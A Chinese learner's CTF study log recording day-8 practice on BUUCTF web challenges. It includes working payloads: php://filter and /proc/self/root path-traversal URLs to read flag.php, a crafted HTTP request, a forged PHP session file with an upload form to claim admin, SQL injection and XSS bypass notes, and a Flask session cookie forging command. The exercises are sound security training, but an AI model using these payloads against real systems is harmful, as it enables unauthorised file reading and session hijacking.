x

想吃炸鸡day8,真服了为什么php xebug配不好,我记得之前调好过,但是没有记录,现在全忘了,你说我这样一个环境都配不明白的人真的能学好计算机吗

发现一个宝藏教程,非常详细,我能看得懂

https://www.shawroot.cc

[安洵杯 2019]iamthinking

tp6反序列化pop链(TODO)

parse_url小结

phpggc使用

exp

[WMCTF2020]Make PHP Great Again 2.0

require_once软链接绕过

嘿黑遇到之前看过的文章的知识点了,但坏消息是又忘了

1
?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php
1
?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php%20

[BSidesCF 2020]Hurdles

curl工具使用,http基础认证

bp具体操作,rfc标准6265

1
2
3
4
5
6
7
8
9
10
11
12
13
14
PUT /hurdles/!?get=flag&%26%3d%26%3d%26=%2500%0a HTTP/1.1
Host: node5.buuoj.cn:26001
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: 1337 browser v.9100
x-forwarded-for: 13.37.13.37,127.0.0.1
cookie: Fortune=6265
Accept: text/plain
Accept-Encoding: gzip, deflate
Accept-Language: ru
origin: https://ctf.bsidessf.net
referer: https://ctf.bsidessf.net/challenges
Authorization: Basic cGxheWVyOjU0ZWYzNmVjNzEyMDFmZGY5ZDE0MjNmZDI2Zjk3ZjZi
Connection: close

[EIS 2019]EzPOP

再次复习php filter绕过exit

2次base64编码绕过json_encode,一次seri解码,另一次filter

pop链详解(看不动)

[HFCTF2020]BabyUpload

php的默认文件存储名

debug代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
<?php
error_reporting(0);

function debug($msg, $var = null) {
    echo "\n[DEBUG] " . $msg;
    if ($var !== null) {
        echo " => ";
        var_dump($var);
    } else {
        echo "\n";
    }
}

session_save_path("F:\cry\savePath");
session_start();

require_once "F:\cry\\flag.txt";

highlight_file(__FILE__);

debug("=== 程序开始 ===");

debug("SESSION_ID", session_id());
debug("SESSION 初始内容", $_SESSION);

if($_SESSION['username'] === 'admin')
{
    debug("当前是 admin");

    $filename='F:\cry\savePath\success.txt';

    debug("success 文件路径", $filename);

    if(file_exists($filename)){
        debug("success.txt 存在");
        safe_delete($filename);
        die($flag);
    }
}
else{
    debug("不是 admin,设置为 guest");
    $_SESSION['username'] ='guest';
}

debug("SESSION 当前内容", $_SESSION);

$direction = $_GET['direction'] ;
$attr = $_GET['attr'] ;

debug("direction", $direction);
debug("attr", $attr);

$dir_path = "F:\cry\savePath".$attr;

if($attr==="private"){
    $dir_path .= "/".$_SESSION['username'];
}

debug("dir_path", $dir_path);

########################################
# upload 分支
########################################
if($direction === "upload"){
    debug("进入 upload 分支");

    try{
        if(!is_uploaded_file($_FILES['up_file']['tmp_name'])){
            throw new RuntimeException('invalid upload');
        }

        $file_path = $dir_path."/".$_FILES['up_file']['name'];
        $file_path .= "_".hash_file("sha256",$_FILES['up_file']['tmp_name']);

        debug("最终 file_path", $file_path);

        if(preg_match('/(\.\.\/|\.\.\\\\)/', $file_path)){
            throw new RuntimeException('invalid file path');
        }

        @mkdir($dir_path, 0700, TRUE);

        if(move_uploaded_file($_FILES['up_file']['tmp_name'],$file_path)){
            $upload_result = "uploaded";
        }else{
            throw new RuntimeException('error while saving');
        }

    } catch (RuntimeException $e) {
        $upload_result = $e->getMessage();
    }
}

########################################
#  download 分支(重点)
########################################
elseif ($direction === "download") {

    debug("进入 download 分支");

    try{
        $filename = basename(filter_input(INPUT_GET, 'filename'));
        debug("用户传入 filename", $filename);

        $file_path = $dir_path."/".$filename;
        debug("拼接 file_path", $file_path);

        if(preg_match('/(\.\.\/|\.\.\\\\)/', $file_path)){
            throw new RuntimeException('invalid file path');
        }

        ########################################
        #  关键:读取 session 文件内容
        ########################################
        if (strpos($filename, "sess_") === 0) {
            $real_session_path = "F:\cry\savePath\\".$filename;

            debug("检测到 session 文件", $real_session_path);

            if (file_exists($real_session_path)) {
                $session_content = file_get_contents($real_session_path);

                debug("SESSION 文件原始内容", $session_content);

                echo "\n\n==== SESSION FILE CONTENT ====\n";
                echo $session_content;
                echo "\n==== END ====\n\n";
            } else {
                debug("session 文件不存在");
            }
        }

        ########################################

        if(!file_exists($file_path)) {
            throw new RuntimeException('file not exist');
        }

        header('Content-Type: text/plain');

        $content = file_get_contents($file_path);

        debug("文件内容", $content);

        echo "\n\n==== DOWNLOAD CONTENT ====\n";
        echo $content;
        echo "\n==== END ====\n\n";

    } catch (RuntimeException $e) {
        $download_result = $e->getMessage();
        debug("异常", $download_result);
    }

    exit;
}

debug("=== 程序结束 ===");
?>

其实不用debug,直接复制粘贴题目然后改一下路径就可以在F:\cry\savePath下发现sess_phpsessid文件

1
2
php_binary引擎:键名的长度对应的ascii字符+键名+经过serialize()函数序列化后的值
usernames:5:"admin";

构造sess文件

上传伪造admin身份的sess文件,本地构造上传点

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<html>
    <head>
        <meta charset="utf-8">
    </head>
    <body>
        <form action="http://85daafec-8582-4f39-b121-8ab733bdf710.node3.buuoj.cn/" method="post" enctype="multipart/form-data">
        <input type="file" name="up_file" />
        <input type="hidden" name="attr" value="">
        <input type="hidden" name="direction" value="upload">
        <input type="submit" name="submit" value="提交">
        </form>
    </body>
</html>

复现失败了,好懵啊,明天再看

[SWPU2019]Web4

堆叠注入判断方法,json的body请求体联想到sql注入,pdo堆叠注入,无回显就时间盲注,过滤关键字就16进制,$img_dir = dirname(FILE) . $img_file;造成路径遍历

姬神的web入门之时间盲注

[GWCTF 2019]mypassword

xss非递归替换双写绕过

login.js中的记住密码功能将password存在cookie里面

在phpstuday上自建xss平台

内网穿透(没配好)

1
http://xss/BlueLotus_XSSReceiver-master/install.php

自建也失败了,一遇到xss就失败,试了bee,collaborator和自建都失败了

哎collaborator刚才成功了,但是带不出来数据

[RoarCTF 2019]Online Proxy

这题环境打不开

[NewStarCTF 2023 公开赛道]ez_sql

拿到题一定要先自己做

闭合前内容要是数据库存在的内容,闭合完加注释,注释前不能加空格,–+成功率最高

sqlmap指令速看

[PASECA2019]honey_shop

太智障了,已经看出来是flask session了我还用php://filter读取,所以一定要先自己做,不然不知道自己有多智障,应该用…/…/…/etc/passwd读取,读通后马上读环境变量得知PYTHON_VERSION=3.8.0,数据的两种存储方式:数据库或者cookie

1
python flask_session_cookie_manager3.py encode -s "PiNsm9axGc2y4HM54dcjXVACNH0VgD8F7tAUn2Rq" -t "{\"balance\":1338,\"purchases\":[]}"

如有错误,多多指教

valine